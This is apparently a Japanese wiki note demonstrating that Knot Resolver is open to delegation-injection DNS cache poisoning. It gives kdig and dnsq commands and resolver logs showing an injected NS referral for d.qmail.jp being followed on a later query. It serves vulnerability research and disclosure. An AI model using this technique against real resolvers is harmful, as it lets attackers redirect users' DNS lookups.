DNS/KnotResolver/d.qmail.jp/3について、ここに記述してください。
残念ながら、「委任インジェクション」は防げていません。
d.qmail.jp が emtpy の時は $ kdig -t a xxxx.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 8907 ;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0 ;; QUESTION SECTION: ;; xxxx.d.qmail.jp. IN A ;; AUTHORITY SECTION: qmail.jp. 2505 IN SOA f.ns.qmail.jp. hostmaster.m.qmail.jp. 1445682184 16384 2048 1048576 2560 ;; Received 87 B ;; Time 2015-10-24 19:24:27 JST ;; From 127.0.0.3@53(UDP) in 0.2 ms
これをキャッシュに入れておいて、問い合せを送ります。
毒の代わりに d.qmail.jp NSを設定しておきます。
$ dnsq a xxxx.d.qmail.jp 14.192.44.5
1 xxxx.d.qmail.jp: 68 bytes, 1+0+1+1 records, response, noerror query: 1 xxxx.d.qmail.jp authority: d.qmail.jp 259200 NS a.ns.d.qmail.jp additional: a.ns.d.qmail.jp 259200 A 14.192.44.29
$ kdig -t a xxxx.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 8907 ;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0 ;; QUESTION SECTION: ;; xxxx.d.qmail.jp. IN A ;; AUTHORITY SECTION: qmail.jp. 2505 IN SOA f.ns.qmail.jp. hostmaster.m.qmail.jp. 1445682184 16384 2048 1048576 2560 ;; Received 87 B ;; Time 2015-10-24 19:24:27 JST ;; From 127.0.0.3@53(UDP) in 0.2 ms
これはキャッシュからの返事です。 
以下が攻撃です。
$ kdig -t a yyyyy.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 206 ;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0 ;; QUESTION SECTION: ;; yyyyy.d.qmail.jp. IN A ;; AUTHORITY SECTION: d.qmail.jp. 2560 IN SOA a.ns.d.qmail.jp. hostmaster.d.qmail.jp. 1444734355 16384 2048 1048576 2560 ;; Received 86 B ;; Time 2015-10-24 19:25:01 JST ;; From 127.0.0.3@53(UDP) in 116.4 ms
1. log
[plan] plan 'xxxx.d.qmail.jp.' type 'A' [resl] => root priming query [plan] plan '.' type 'NS' [resl] => querying: '192.36.148.17' score: 10 zone cut: '.' m12n: '.' type: 'NS' [iter] <= rcode: NOERROR [resl] => querying: '202.12.27.33' score: 10 zone cut: '.' m12n: 'JP.' type: 'NS' [iter] <= referral response, follow [resl] => querying: '192.50.43.53' score: 10 zone cut: 'jp.' m12n: 'qMAIL.JP.' type: 'NS' [iter] <= referral response, follow [resl] => querying: '14.192.44.5' score: 10 zone cut: 'qmail.jp.' m12n: 'D.QMail.Jp.' type: 'NS' [iter] <= rcode: NXDOMAIN [iter] <= found cut, retrying with non-minimized name [ pc ] => answer cached for TTL=900 [resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'XXxx.d.QMAiL.jp.' type: 'A' [iter] <= rcode: NXDOMAIN [ pc ] => answer cached for TTL=900 [resl] finished: 4, queries: 2, mempool: 16392 B [plan] plan 'd.qmail.jp.' type 'NS' [ pc ] => satisfied from cache [iter] <= rcode: NXDOMAIN [resl] finished: 4, queries: 1, mempool: 16392 B [plan] plan 'xxxx.d.qmail.jp.' type 'A' [ pc ] => satisfied from cache [iter] <= rcode: NXDOMAIN [resl] finished: 4, queries: 1, mempool: 16392 B
then query yyyy.d.qmail.jp (usually NXDOMAIN)
- (but we can poison d.qmail.jp NS [referral] as qmail.jp)
[plan] plan 'yyyyy.d.qmail.jp.' type 'A' [resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'YYYyy.d.QMaiL.jp.' type: 'A' [iter] <= referral response, follow [resl] => querying: '14.192.44.29' score: 10 zone cut: 'd.qmail.jp.' m12n: 'YYYyy.D.qMAIl.jP.' type: 'A' [iter] <= rcode: NXDOMAIN [ pc ] => answer cached for TTL=900 [resl] finished: 4, queries: 1, mempool: 16392 B